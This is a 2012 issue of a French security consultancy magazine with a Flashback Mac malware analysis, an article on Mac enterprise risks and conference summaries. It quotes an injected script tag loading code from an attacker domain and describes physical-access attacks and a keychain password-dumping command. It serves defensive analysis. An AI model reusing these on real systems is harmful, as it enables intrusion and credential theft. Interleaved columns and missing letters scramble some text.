Vous êtes sur la page 1sur 43

actu

scu 32
lACTUSCU est un magazine numrique rdig et dit par les consultants du cabinet de conseil XMCO SEPTEMBRE 2012
Ruben Bos

MAC & SCURIT


Vulnrabilits et malware

FlashBack
Analyse du premier vrai malware pour Mac OS X

Un Mac dans votre SI ?


Vulnrabilits et risques associs

Confrences
Hack In Paris, Hackito et SSTIC

Actualit du moment
Analyses des vulnrabilits MS12-043, MySQL (CVE-2012-2122), F5 BIG-IP (CVE-2012-1493)

Et toujours les blogs, les logiciels et nos Twitter favoris !


Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

we deliver security expertise

www.xmco.fr
2
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Lanne dernire, DG consultants a ft les 10 ans
des Assises de la Scurit. Cet vnement relative-
dito SEPTEMBRE 2012
Rassurez-vous, il en reste quand mme une bonne
partie dans ldition gratuite ! On ne se refait pas...
ment incontournable regroupe la majorit des ac- ;-)
teurs de la scurit informatique. XMCO y participera
pour la troisime fois cette anne, mais la saveur de Je profite de cette tribune pour remercier nos clients,
cette dition sera un peu particulire pour nous. En pour lesquels nous essayons de donner le meilleur
effet, cest notre tour de fter nos 10 ans ! dentre nous, et dont la fidlit constitue lune de
mes plus grandes satisfaction. Je remercie gale-
10 ans, cest la fois beaucoup, et, je lespre, trs ment mes collaborateurs pour la confiance quils ont
peu par rapport ce qui nous attend ! porte en moi, et pour leur investissement person-
nel dans notre aventure.

Dans ce nouveau numro, vous constaterez que Je vous souhaite une bonne lecture.
nous avons opr quelques modifications. En effet,
compte-tenu de linvestissement que nous consa- Marc Behar
crons pour produire ce magazine, et du dveloppe- Directeur
ment du CERT-XMCO, nous avons dcid de rserver
lintgralit de lActu-
Scu aux abonns du [ XMCO aux Assises de la scurit ]
CERT-XMCO. Une ver-
sion sera toujours tlchargeable librement sur notre
site Web. Toutefois, certains articles seront retirs, ou
incomplets.

Soit nous faisions appel la publicit pour maintenir

ScScoobay
un tel niveau deffort et de qualit, soit nous met-
tions en avant les services que nous dlivrons dj
pour certains de nos clients.

Nous avons prfr conserver notre indpendance,


car elle na pas de prix. Jespre que les 6 ans pen-
dant lesquels tous les numros de lActu-Scu ont t
mis votre disposition, auront pu vous convaincre de
lintrts de nos articles... et que vous aurez envie de
les dcouvrir dans leur intgralit.

XMCO PARTENAIRE DE :

3
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Vous tes concern
par la scurit informatique
de votre entreprise ?
XMCO est un cabinet de conseil dont le mtier est
laudit en scurit informatique.
Fond en 2002 par des experts en scurit et dirig par ses
fondateurs, les consultants de chez XMCO ninterviennent que
sous forme de projets forfaitaires avec engagement de rsultats.

Les tests dintrusion, les audits de scurit, la veille en
we deliver security expertise
vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.

Paralllement, nous intervenons auprs de Directions Gnrales


dans le cadre de missions daccompagnement de RSSI,
dlaboration de schma directeur ou encore de sminaires de
sensibilisation auprs de plusieurs grands comptes franais.

Pour contacter le cabinet XMCO et dcouvrir nos prestations :


http://www.xmco.fr

Nos services

Test dintrusion
Mise lpreuve de vos rseaux, systmes et applications web par nos
experts en intrusion. Utilisation des mthodologies OWASP, OSSTMM, CCWAPSS.

Audit de Scurit
Audit technique et organisationnel de la scurit de votre Systme
dInformation. Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley.

Certification PCI DSS


Conseil et audit des environnements ncessitant la certification PCI DSS
Level 1 et 2.

Cert-XMCO : Veille en vulnrabilits et


Cyber-surveillance
Suivi personnalis des vulnrabilits, des menaces et des correctifs affectant
votre Systme dInformation.

Cert-XMCO : Rponse intrusion


Dtection et diagnostic dintrusion, collecte des preuves, tude des logs,
autopsie de malware.
4
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
sommaire
p. 6 p. 6

Flashback
p. 11 Analyse du premier vrai
malware pour MAC OS X

p. 11

Un MAC dans votre SI ?


Risques et attaques lencontre
du systme dexploitation
dApple

p. 16
p. 16 Confrences
Hack In Paris, Hackito et SSTIC

p. 27

Lactualit du moment
MS12-043, MySQL (CVE-2012-
2122), F5 BIG-IP (CVE-2012-
1493) et BlackHole

p. 37

Blogs, logiciels et exten-


sions
p. 37 WOLFY, Microsoft Security Com-
p. 27 pliance Manager et Twitters.

Conformment aux lois, la reproduction ou la contrefaon des mo-


Contact Rdaction : actu.secu@xmco.fr - Rdacteur en chef : Adrien GUINAULT - Direction artistique : dles, dessins et textes publis dans la publicit et la rdaction de
Romain MAHIEU - Ralisation : Agence plusdebleu - Contributeurs : Lionel AKAGAH, Antonin AUROY, lActuScu 2012 donnera lieu des poursuites. Tous droits rservs
- Socit XMCO. la rdaction dcline toute responsabilit pour tous les
Stphane AVI, Frdric CHARPENTIER, Charles DAGOUAT, Yannick HAMON, Stphane JIN, Franois LEGUE, documents, quel quen soit le support, qui lui serait spontanment
confis. Ces derniers doivent tre joints une enveloppe de rexpdi-
Arnauld MALARD, Julien MEYER, Pierre TEXIER. tion prpaye. Ralisation, Janvier 2012.
5
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> FlashBack, le premier VRAI malware pour Mac OS
Rcemment lapparition dun malware baptis Flashback ou Flashfake , premier vrai
virus ciblant uniquement les systmes Mac OS X, est venu confirmer lintrt grandissant des
pirates pour les systmes dexploitation dApple.

Cet article a pour objectif de dissquer Flashback avec, dans un premier temps, une pr-
sentation thorique fonde sur les lments prsents sur la toile et dans un second temps,
une analyse technique des mcanismes dinfection effectue depuis des chantillons de
Flashback .
par Antonin AUROY, Lionel AKAGAH et Arnaud MALARD

FlashBack

Paperghost

Les ordinateurs Macintosh ont toujours eu la rputation premires failles et des erreurs dimplmentation impor-
dtre srs avec peu ou pas de virus existants pour leur tantes, le premier virus digne de ce nom est apparu. Reve-
systme dexploitation car trs peu de pirates semblaient nons sur lhistorique de cette menace et des mcanismes
sy intresser, contrairement aux PC Windows. dinfection.

La donne semble avoir chang depuis 2006, lorsque les


premiers virus et exploits ont fait leur apparition. A par-
tir de ce moment, la firme de Cupertino a commenc
prendre conscience de lexploitation potentielle de failles
de scurit affectantson systme dexploitation. Aprs les
6
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Historique un cart de 1 3 mois entre la publications du correctif
par Oracle et la publication du correctif par Apple. Conce-
Naissance de Flashback rant la vulnrabilit rfrence CVE-2012-0507, le correctif
Oracle a t publi en fvrier 2012 contrairement celui
Le malware Flashback a t officiellement dcouvert dApple qui ne la t quentre le 3 avril 2012. Cet cart a
en fvrier 2012. Cependant, les premires versions exis- permis certains pirates dexploiter massivement la faille
taient dj depuis septembre 2011. Ainsi, de septembre de scurit, en particulier les auteurs de Flashback qui en
2011 fvrier 2012, un nombre important dordinateurs ont profit pour agrandir leur botnet. Dautant plus que de
fonctionnant sous Mac OS X a t infect par Flash- nombreux utilisateurs, malgr la publication urgente du
back , environ 700 000 travers le monde (Australie, correctif, navaient pas effectu de mise jour.
Royaume-Uni, Etats-Unis, Canada, etc.). Ces machines ont
t utilises pour constituer un botnet gant. Flashback a t officiellement
dcouvert en fvrier 2012.
Pour prende le contrle de ces machines, les pirates ont Cependant, les premires versions
exploit deux failles distinctes au sein de Java (CVE-2008-
existaient dj depuis septembre 2011
5353 et CVE-2011-3544), ainsi quune attaque dingnierie
sociale qui visait tromper lutilisateur afin de lui faire
installer, son insu, le malware.
Par ailleurs, dans la mme optique dexpansion maximale
du botnet Flashback , les cybercriminels se sont ser-
vis dun programme partenaire dorigine russe. Ce dernier
sappuie sur un script qui permet deffectuer des redirec-
tions depuis plusieurs sites travers le monde vers des
sites malicieux.

Ds fin fvrier/dbut mars 2012, plusieurs sites bass sur


le CMS WordPress, dont la plupart sont situs aux Etats-
Unis, ont t compromis. Les causes possibles avances
furent lutilisation dune version vulnrable de WordPress
par les bloggeurs ou linstallation par ces derniers du plu-
gin ToolsPack.
Allan Reyes

Lors de la visite dun site spcialement conu, il tait de-


mand aux utilisateurs de tlcharger et dinstaller une
mise jour dAdobe Flash Player qui, en ralit, contenait
par ailleurs un cheval de Troie. Les pirates, via lutilisation
dun certificat numrique proche de celui dApple (mme
contenu mais non sign par une autorit de confiance),
cherchaient rassurer lutilisateur quant la lgitimit
de lapplication en certifiant lidentit de lditeur
(en loccurence dApple) du programme malveillant. Les
failles Java exploites provenaient dune ancienne version
de Java qui nest plus distribue par Apple depuis la sortie
de Mac OS X 10.7 (Lion). Les versions de Mac OS X les
plus touches furent donc Snow Leopard (10.6) et Leopard
(10.5), qui intgraient Java par dfaut.

Enfin, une fois install, le malware cherchait drober


des informations personnelles telles que les identifiants
de connexion certains sites Internet tels que Google, Ya-
Quelques mdias ont relay linformation sur lattaque Wordpress.
hoo!, CNN, PayPal ou encore des sites de banque en ligne.

A partir de mars 2012, une volution du virus a fait sur-


Ci-dessous un exemple de code inject au sein des pages
face. Elle exploite, cette fois-ci, une autre vulnrabilit
des blogs compromis :
Java rfrence CVE-2012-0507. Son exploitation venait
principalement du fait quApple nimplmente jamais les
<script src=http://domainname.rr.nu/nl.php?p=d></
correctifs publis par Oracle mais prfre publier les siens
script>
pour corriger les vulnrabilits Java, en crant trs souvent
7
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
FlashBack

Les visiteurs de ces blogs taient alors redirigs de ma-


nire transparente vers des sites ayant pour domaine
> Chronologie de linfection
rr.nu et utilisant un kit dexploitation pour infecter les
Entrons maintenant dans les dtails techniques du proces-
machines des visiteurs. Ces infections se droulaient en
sus dinfection.
plusieurs phases qui seront prsentes par la suite dans
cet article.
Exploitation des vulnrabilits
Pourquoi avoir conu Flashback ?
La premire phase de linfection consiste en lexcu-
tion dun code JavaScript utilis pour charger une ap-
La motivation principale des cybercriminels derrire Flash-
plet Java. Cette dernire a alors comme objectif dins-
back est bien sr financire, notamment grce au module
taller quatre applications Java sur le systme de la
dinterception et de modification du trafic Web li au pro-
victime. Trois dentre elles exploitent les vulnrabilits
gramme Google Ads . Celui-ci force les internautes
Java rfrences CVE-2008-2323, CVE-2011-3544 et CVE-
leur insue gnrer des clics sur des liens publicitaires et
2012-0507 alors que la quatrime tente de tromper les
rmunre ainsi les annonceurs sur chaque clic effectu par
utilisateurs, via de lingnierie sociale, afin quils ex-
les ordinateurs compromis.
cutent cette application quils pensent tre lgitime.
La premire phase de linfection consiste en En cas dchec de la mthode dcrite plus haut,
lexcution dun code JavaScript utilis pour une autre mthode dinfection consiste en lex-
charger une applet Java cution dune autre applet Java spcialement
conue qui ncessite les droits dadministration.
Dans les deux cas, lexcution de lapplet Java
Une premire estimation faite par des chercheurs avait implique avant tout la validation de lutilisa-
annonc que les cybercriminels pouvaient esprer gagner teur, celle-ci ntant pas signe par Apple.
jusqu 10 000 dollars par jour laide de leur botnet. La premire phase de linfection aboutit donc linstalla-
Cependant, les choses ne se sont pas vraiment droules tion du conteneur, appel aussi Dropper , qui aura en
comme prvu (cf. bulletin CXA-2012-0865) du fait, entre charge le tlchargement et linstallation dautres compo-
autres, dune faible installation du module complmen- sants du malware.
taire sur la totalit des machines infectes

> INFO
Apple publie un outil de suppression du malware
Flashback

Suite au grand nombre de systmes Mac OS X compro-


mis par le malware Flashback, Apple a publi un outil de
suppression du virus.

Loutil disponible depuis le 13 avril pour les versions de


Mac OS X suprieures Lion (10.7) a t rcemment mis
jour afin de supporter
les versions comprises entre 10.5 et 10.5.8 (Lopard).

Si le malware tait dtect par cette mise jour, une


boite de dialogue en informerait lutilisateur.

h t t p : // l i s t s . a p p l e . co m / a r c h i v e s / s e c u r i t y - a n -
nounce/2012/May/msg00003.html
Etapes dinfection

8
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Dpt de linstalleur

Le conteneur en question est un fichier au format binaire


Mach-O. Il contient un module 32 ou 64 bit (appel ins-
talleur principal par la suite) selon la version du systme
dexploitation de la machine de la victime.
Suppression de lexcutable

En sexcutant, linstalleur principal vrifie au pralable


si lune des applications de scurit suivantes, dont la
Architectures supportes par linstalleur de Flashback
majeure partie correspond des logiciels de scurit, est
prsente sur la machine infecte : LittleSnitch (un firewall
Pour notre analyse technique nous avons utilis des exem- pour Mac OS), XCode, VirusBarrierX6, iAntiVirus, Avast!,
plaires rcents du virus, rcuprs sur le site : lantivirus ClamXav, HTTPScoop et Packet Peeper. Si cest
http://contagiodump.blogspot.fr/ le cas, linstalleur principal se supprime automatiquement
de la machine et linfection est stoppe.
Comme le montre la capture ci-dessous, les chantillons
ont t soumis VirusTotal qui a permis de mettre en Dans le cas contraire, si aucune des applications nest pr-
vidence que seulement 29 diteurs dantivirus sur 42 ont sente, linstalleur principal se connecte alors lun des
dtect le contenu malicieux. serveurs C&C et transmet ce dernier des informations
sur la machine infecte telles que lIdentifiant Universel
Unique (UUID, propre lutilisateur courant du systme), la
version du systme dexploitation, les droits avec lesquels
il sexcute, larchitecture du systme (32 ou 64 bits), etc.

Rcupration de lUUID

Analyse VirusTotal de linstalleur Pour communiquer avec le serveur C&C, linstalleur envoie
des requtes HTTP GET.
Parmi ces antivirus, certains sont uniquement compatibles
avec Windows, ce qui peut expliquer un taux de dtec-
tion aussi faible. Les diteurs dantivirus, ayant dvelopp
un antivirus pour Mac OS X tels que Avast !, BitDefender
Antirus for Mac, Sophos Anti-virus, Avira, et enfin ClamXav,
ont par contre t mme de dtecter le malware sans
aucun problme.

Connexion de linstalleur principal au serveur C&C

Le rle principal de cet installeur est dtablir une com-


munication avec le serveur de Commandes et de Contrle
(C&C) de premier niveau, de vrifier si la machine remplit
les conditions ncessaires son infection, et si cest le cas,
de tlcharger des modules supplmentaires et de les ins-
taller sur le systme de la victime. Une fois son excution
termine, quelque soit le rsultat, linstalleur va seffacer
du systme de la victime.
Utilisation du protocole HTTP

9
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
La requte envoye est de la forme suivante : La suite de cet article est rserve aux abonns du
http://<adresse ip du serveur>/counter/<informations CERT-XMCO
encodes en base64>.

URL de la requte envoye au serveur C&C (encodage des informations


envoyes en base 64)

Le rle principal de cet installeur


est dtablir une communication
avec le serveur C&C de premier niveau et
de vrifier si la machine
remplit les conditions ncessaires son
infection

URL de la requte envoye au serveur C&C (informations envoyes


dcodes)
imafo

10
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Un Mac dans votre SI, quels risques ?
Abondamment utiliss dans les secteurs de la communication, de la publicit et du marke-
ting, les ordinateurs Apple commencent peu peu simposer en entreprise. Souvent rser-
vs aux VIP ou aux cratifs qui ncessitent davoir des outils de mise en page professionnels,
les Mac sintgrent peu peu aux Systmes dInformation ce qui engendre ncessairement
une nouvelle vision de la scurit du SI. La prsence dun Mac induit-elle des risques pour
votre SI ? Rponse dans cet article...
par Arnaud MALARD

Un Mac dans votre SI, quels risques ?


Andy Langager

lentreprise. Quel est le risque encouru ? Quels sont les


> Introduction risques de compromission et de fuite de donnes ? Cet
article fournira des lments de rponse ces questions
Le systme Mac OS X est en pleine expansion, cest une
en prsentant diffrentes techniques de prise de contrle
certitude, et les chiffres parlent deux mme : la sortie
dun systme Mac OS X, dune part travers des vulnra-
de la nouvelle version de Mac OS X en septembre 2011,
bilits logicielles et dautre part depuis un accs physique.
Lion 10.7, la part de march de Mac OS X a grimp dun
Nous voquerons par la suite quelques exemples de fuites
point en un mois (de 9,6 % 10,6 %). Certes, Lion apporte
dinformations sensibles pouvant tre provoques par un
des nouvelles fonctionnalits, une meilleure stabilit et
acteur malveillant depuis un accs au systme.
des nouveaux mcanismes de scurit, mais la sortie de
cette nouvelle version est-elle la seule cause de ce succs
? Probablement que non. Apple occupe galement une
pixelmaniatik

importante part du march des tablettes et des Smart-


phones. La satisfaction de cette population dutilisateurs
donne une raison supplmentaire pour sauter le pas et
passer sous Mac OS X.

Si nous combinons ce phnomne de mode avec la nou-


velle tendance du moment, le BYOD (Bring Your Own De-
vice), il est fort probable que les systmes Mac OS X - et
cest dj le cas dans certaines entreprises - se retrouvent
rapidement connects aux Systmes dInformation de
11
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Un Mac dans votre SI,
quels risques ?

> Exploiter les vulnrabilits logi-


Les vulnrabilits exploitables depuis le rseau local
cielles
Par contre, en ce qui concerne les moyens dexploitation
Les vulnrabilits exploitables lors de la navigation des vulnrabilits distantes, le constat nest pas le mme
: Microsoft est bien loin devant. En effet, le nombre
Depuis Internet, lapproche la plus courante pour com- dexploits distants (programme dexploitation de vuln-
promettre un systme est de tenter dexploiter simulta- rabilits depuis un rseau distant ou local) conus contre
nment la faille humaine et une vulnrabilit tech- les plateformes Mac OS X est encore trs limit par rapport
nique dans le but dinstaller aux dpens de la victime un Microsoft Windows (environs 15 pour Mac OS X depuis
programme malveillant. Un exemple trs rcent et qui a 2010 contre 145 pour Windows depuis 2011). Cependant,
fait la une des mdias est le malware Flashback. Celui-ci Mac OS X tant de plus en plus pris pour cible par les
sappuyait sur une vulnrabilit de Java non corrige et chercheurs en scurit et les pirates, ces chiffres devraient
se prsentait la victime sous la forme dune inoffen- grossir de manire significative dans les annes venir.
sive mise jour du logiciel Adobe Flash (cf ActuScu #31).
FlashBack a fait des dgts : plus dun million de machines
Mac OS X compromises. Cest le premier vrai malware Depuis un accs distant, la manire
dvelopp exclusivement pour Mac OS X et permettant la
prise de contrle du systme et le vol dinformations.
la plus simple semble donc
de passer par des logiciels tiers... tels que
Depuis un accs distant, la manire la plus simple semble Flash, Acrobat, Safari, QuickTime
donc de passer par des logiciels tiers installs sur le sys- ou encore iTunes
tme. En effet, la cause principale dune compromission
est due une vulnrabilit prsente dans un logiciel tiers,
cest--dire un logiciel autre que le systme dexploita- Evidemment, depuis le rseau, un attaquant peut gale-
tion lui-mme. Les logiciels tels que Flash, Acrobat, Safari, ment tenter dexploiter des vulnrabilits classiques
QuickTime ou encore iTunes sont souvent des cibles privi- des services qui peuvent tre ouverts sur Mac OS X : SSH,
lgies par les pirates. le Bureau Distance, FTP, iTunes, etc. En effet, Mac OS
X intgre nativement ces diffrents services qui peuvent
Le scnario classique exploit par ces derniers est de tre activs en un clic par lutilisateur nophyte. Ainsi, les
convaincre une victime, travers un site Web, de tl- utilisateurs non-informaticiens peuvent aisment hber-
charger le dernier MP3 de Lady Gaga pas encore sorti ou ger et publier travers dun Mac leurs photos de famille,
encore la nouvelle Sex-Tape de Paris Hilton. Une fois le mais quel risque ?
fichier tlcharg et ouvert, la faille iTunes, QuickTime (ou
autre) est exploite et permet dinstaller un programme Une recherche rapide avec les bons mots clefs sur votre
malveillant (Cheval de Troie) au cur du systme. Ainsi, le moteur de recherche prfr vous permettra didentifier
pirate pourra utiliser la machine de la victime pour raliser des donnes stockes sur des serveurs Web Mac OS X tels
des oprations illicites. Ltude de 2010, prsente ci-des- que des archives mails, des calendriers, des documents
sous, rvle dailleurs que Apple a t le numro 1 en Office et galement le fameux trousseau daccs qui
ce qui concerne le nombre de vulnrabilits dcouvertes contient un nombre important de mots de passe de lutili-
sur les produits tiers. sateur (comptes Google, Skype, clefs WiFi, certificats, client
de messagerie Mail/Outlook, iTunes, OpenVPN, etc.).

Les vulnrabilits exploitables localement

Depuis un accs au systme Mac OS X, cest--dire un


accs physique, bureau distance ou encore SSH, un
pirate essayera dlever ses privilges : passer dun simple
utilisateur avec des droits limits un compte dadminis-
tration.

A lheure actuelle, ce type dattaque trs rpandue dans


le monde Microsoft ou Linux, se rvle difficile raliser
sur Mac OS X la vue du peu de failles dcouvertes et du
12
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
peu de programmes dexploitation publis ce sujet. Le Accs en mode Target
constat est en effet le mme que pour les exploits dis-
tants, 44 exploits pour Mac OS X depuis 2003 (contre 220 Une autre technique simple, pour accder au systme
pour Windows depuis 2011). de fichiers dun Mac sans en connatre le mot de passe,
consiste utiliser un simple cble FireWire branch la
Par contre, lutilisation de programmes malveillants et machine est ncessaire.
les attaques par lvation de privilges ne sont pas for-

Adrien Guinault
cment ncessaires pour provoquer des fuites dinforma-
tions douloureuses pour un utilisateur et son entreprise : il
existe aussi les attaques physiques .

>Exploiter les accs physiques


Comme vous allez le constater, si vous avez la possibilit
daccder physiquement une machine hbergeant Mac
OS X, il est souvent trs ais den prendre le contrle total.

Accs sans mot de passe

Le premier lment connaitre sur Mac OS X est quavec


une installation par dfaut de type next-next-next , la
session souvre automatiquement avec le compte du pre- Le mode Target , activable au dmarrage dun systme
mier utilisateur sans demander de mot de passe. Mac OS X, permet tout individu de transformer celui-ci
en disque externe FireWire. Ainsi, les fichiers prsents sur
Le plus souvent, cela permet donc de prendre simplement le disque dur sont accessibles sans restriction depuis la
le contrle dun Mac qui traine ; dautant plus que cet uti- machine de lindividu, permettant alors un acteur mal-
lisateur possde les privilges dadministration. Toutefois, veillant den extraire des donnes sensibles (ex : mots de
le mot de passe de lutilisateur est souvent ncessaire passe des utilisateurs du systme) et mtiers (ex : sch-
pour accder des paramtres sensibles propres luti- ma rseau, fichiers Excel de mot de passe). Evidemment,
lisateur ou au systme. Mais, comme Mac OS X ne force laccs par ce biais nest pas possible si le disque dur a t
pas une politique de mot de passe, lutilisateur a donc la intgralement chiffr par une solution telle que Filevault 2
libert den choisir un trivial et donc identifiable rapide- livr avec la dernire mouture de Mac OS X Lion.
ment par un acteur malveillant.
Comme pour tout type dordinateur, si laccs lEFI
(quivalent du BIOS) nest pas scuris, il est galement
possible daccder aux fichiers du systme Mac OS X en
dmarrant la machine par un systme tiers (Backtrack)
install sur une clef USB ou un CDROM.

Accs en mode Single

Un moyen encore plus simple est dexploiter le mode


Single , mode activable au dmarrage du Mac avec
une combinaison de touche, et permettant dobtenir une
invite de commande avec les privilges dadministration.
A partir de cet accs privilgi, toutes les commandes
du systme dadministration peuvent tre excutes et
toutes les donnes (non chiffres) peuvent tre extraites.
Adrien Guinault
jimmyroq

13
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Un Mac dans votre SI,
quels risques ?

Accs la mmoire vive >Chercher les informations sensibles


Enfin, le moyen de compromission le plus performant, depuis un accs au systme
mais aussi le plus complexe mettre en uvre, est
dexploiter les accs directs la mmoire RAM (les accs Si un acteur malveillant parvient obtenir un accs par
DMA ). Les interfaces FireWire et/ou Thunderbolt pr- lune des mthodes prsentes prcdemment, quelles
sentes sur tous les MacBook permettent ce type daccs. sont les possibilits offertes et quelles sont les informa-
Ces interfaces sont relies directement la mmoire RAM tions rellement exploitables ? Quelques exemples
sans passer par le microcontrleur et peuvent donc diffi-
cilement bnficier de la protection du systme dexploi- Le fameux Trousseau daccs
tation.
Une attaque publie en 2005 par le chercheur Adam Boi- Comme voqu plus haut, lun des lments les plus sen-
leau consiste muler un iPod sur sa propre machine afin sibles en termes de fuite dinformations sur un systme
que la machine victime, connecte celui-ci travers un Mac OS X est le trousseau daccs. Ce trousseau, qui est
cble FireWire, lui autorise les accs directs sa mmoire. concrtement un fichier chiffr, stocke une importante
Mme si le systme Mac OS X est verrouill, cet accs quantit de mots de passe et de certificats utiliss par
direct la mmoire RAM est autoris, et ce, mme si le lutilisateur pour sauthentifier sur des applications locales
disque dur est intgralement chiffr. et des sites web.

Le moyen de compromission le plus perfor-


mant, mais aussi le plus complexe mettre
en uvre, est dexploiter les accs directs la
mmoire RAM (les accs DMA)

Un attaquant peut modifier le contenu de la mmoire et


contourner lauthentification douverture de session pro-
pose par Mac OS X. Il lui est galement possible dlever
les privilges de nimporte quel utilisateur du systme
afin dobtenir les droits dadministration.

Par ailleurs, ces interfaces FireWire et/ou Thunderbolt Dans un scnario de piratage o un attaquant est parvenu
permettent daccder de trs nombreuses fuite dinfor- obtenir un accs au systme sans connaitre le mot de
mations : lcriture en mmoire RAM tant possible, la passe du compte utilisateur usurp (comme par exemple
lecture lest galement. Ainsi, les informations sensibles avec une session laisse ouverte pendant une pause),
suivantes peuvent tre voles : il ne lui est pas possible, premire vue, daccder aux

+
mots de passe contenus dans le trousseau daccs. Mal-
Mots de passe en clair de lutilisateur stant connect heureusement, la commande systme security dump-
ou tant connect (session active et/ou session verrouil- keychain d lance au travers du terminal (donc avec
le);
+
les droits de lutilisateur courant) permet de visualiser les
Mots de passe du trousseau daccs (si celui-ci nest mots de passe du trousseau en clair sans que le mot de
pas identique au mot de passe systme);
+
passe du compte utilisateur ne soit demand.
Mots de passe saisis travers le navigateur Web;
+ Clef utilise pour chiffrer intgralement le disque dur
(Filevault2);
+ Mots de passe daccs des ressources dun domaine
(Microsoft Exchange, Serveur de fichiers SMB, etc);
+ Etc.

En fin de compte, cet accs DMA permet de voler des


informations par un simple accs physique au systme,
alors quil fallait jusquici avoir russi installer un logiciel Ainsi, malgr le chiffrement du trousseau daccs, un atta-
malveillant avec les droits dadministration pour arriver au quant a la possibilit de raliser de multiples usurpations
mme rsultat. didentit sur des services proposs tels que Evernote,
14
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Google, Skype, iTunes ou encore Microsoft Outlook et Skype
ainsi daccder de nouvelles fuites dinformations tra-
vers les nouveaux accs rseau obtenus (WiFI, accs via Skype peut parfois tre utilis en entreprise avec notam-
certificats privs, VPN, etc.). ment la fonctionnalit de Chat. Skype conserve lhisto-
Ce comportement trange sexplique par le fait que le rique des conversations, mais demande un mot de passe
trousseau daccs de lutilisateur est en ralit ouvert et pour y accder. Or, laccs cet historique peut tre fait
dchiffr automatiquement ds louverture de la ses- directement au travers dune base de donnes prsente
sion afin que le systme y accde sans interaction de la sur le disque dur du Mac, et cela sans authentification.
part de lutilisateur. Cependant, ce scnario est valable Le contenu des conversations est en effet stock en clair
uniquement si le mot de passe protgeant le trousseau dans une base de donnes SQLite locale accessible avec
daccs est identique au mot de passe du systme choisi les droits de lutilisateur mme.
par lutilisateur (configuration par dfaut). En ralit, peu
de propritaires de Mac sont conscients quil est possible
de modifier le mot de passe de leur trousseau daccs,
tellement peu conscient que les moteurs de recherche
> Conclusion
indexent aujourdhui des centaines des trousseaux dac-
La part de march importante occupe par Windows per-
cs en libre accs
met aujourdhui Mac OS X de ntre que la seconde cible
privilgie des pirates et des hackers. Ainsi, les moyens
Webpage Previews
dexploitation dun systme Mac OS X travers des failles
logicielles distantes ou locales restent limits, voire confi-
Safari, le navigateur Internet install par dfaut sur Mac
dentiels. Cependant, le cas du malware Flashback est
OS X, intgre une fonctionnalit trs intressante pour un
probablement une premire indication dun changement
acteur malveillant : Webpage Previews. Celle-ci photo-
dorientation des pirates et des chercheurs de vulnrabi-
graphie chaque page charge ou recharge par le navi-
lits.
gateur de lutilisateur et les stocke instantanment sur le
disque dur.
Mac OS X dispose par contre et contrairement Windows
de nombreux moyens daccs natifs lorsquun accs phy-
Ainsi, il est possible, selon les cas, quun attaquant ac-
sique est possible. Fort heureusement, des moyens de s-
cde des donnes sensibles telles que le contenu dun
curisation, non appliqus par dfaut, existent bel et bien
email, une recherche saisie dans Google, des donnes
[1].
bancaires, le contenu de sites illgaux, des scans NMAP
(cas avr), etc.
Les exemples de fuites dinformations proposs ont per-
mis dentrapercevoir les possibilits offertes par un simple
utilisateur connect un systme Mac OS X. Encore une
fois, les bonnes pratiques de scurisation peuvent limiter
le risque de pertes de donnes.

Un Mac est-il donc un risque pour votre Systme dInfor-


mation ? Oui, sil est configur par dfaut et beaucoup
moins si sa configuration a t renforce selon les bonnes
pratiques de scurit. Depuis la dernire version de Mac
OS X (Lion), nous pouvons considrer quun systme Mac
OS X peut tre aussi bien scuris quun systme Win-
dows, voire plus, et cela sans achat de logiciels de scurit
supplmentaires.
Les cookies
Les personnes souhaitant approfondir le sujet technique-
ment peuvent parcourir une prsentation technique rali-
Comme sur les autres systmes, les cookies stocks sur
se aux GSDays en 2012 [2].
le systme peuvent tre vols par un attaquant afin de
bnficier dun accs encore valide un site web. Il est
intressant de savoir que les cookies des sites comme
Rfrences
www.gmail.com, www.facebook.com, www.twitter.com -
et peut-tre de lun des extranet de lentreprise de la
victime - ont une dure de vie denviron une semaine,
favorisant ainsi lusurpation didentit. Par ailleurs, lac- + [1] Blog de Kaspersky
http://www.securelist.com/en/blog/208193448/10_
cs aux cookies dun utilisateur systme ncessite uni-
Simple_Tips_for_Boosting_The_Security_Of_Your_Mac
quement les droits daccs de lutilisateur mme. Ils et
Ils peuvent donc tre vol par la majorit des attaques
prsentes dans cet article. + [2] Blog dArnaud Malard
http://sud0man.blogspot.fr/2012/04/hackmacosx-gs-
days-2012.html

15
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit
Avec quelques mois de retard, nous vous proposons un rsum des confrences qui se sont
droules ce printemps : Hack In Paris, Hackito et SSTIC..
par Pierre TEXIER, Arnauld MALARD, Franois LEGUE, Antonin AUROY, Lionel AKAGAH, Stphane JIN, Stphane AVI et Julien
MEYER

Hack In Paris

Julien MEYER
> Hack In Paris
La deuxime dition de la confrence Hack In Paris a eu
lieu du 18 au 22 juin 2012, au Centre des confrences de
Disneyland Paris. Plus de 350 personnes ont assist cet
vnement, pour entre autres 16 confrences donnes par
des experts en scurit internationaux.

Lquipe XMCO a assist aux journes ddies aux conf-


rences des 21 et 22 juin. Nous allons vous prsenter le
rsum de certaines de ces confrences.

Aprs un discours douverture (prononc par Olivier Franchi)


de Sysdream, la premire confrence intitule Where are
we and where are we going? fut donne par Mikko Hypo-
nen, le directeur des recherches au sein de la socit F-
Secure.

16
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Where are we and where are we going? des statistiques, des chiffres et des exemples concrets, il
Mikko Hyponen a t possible de mieux comprendre les enjeux lis ce
problme.
+ Slides
http://hackinparis.com/slides/hip2k12/Mikko%20H-Key- Ainsi, les attaques par social engineering les plus utilises
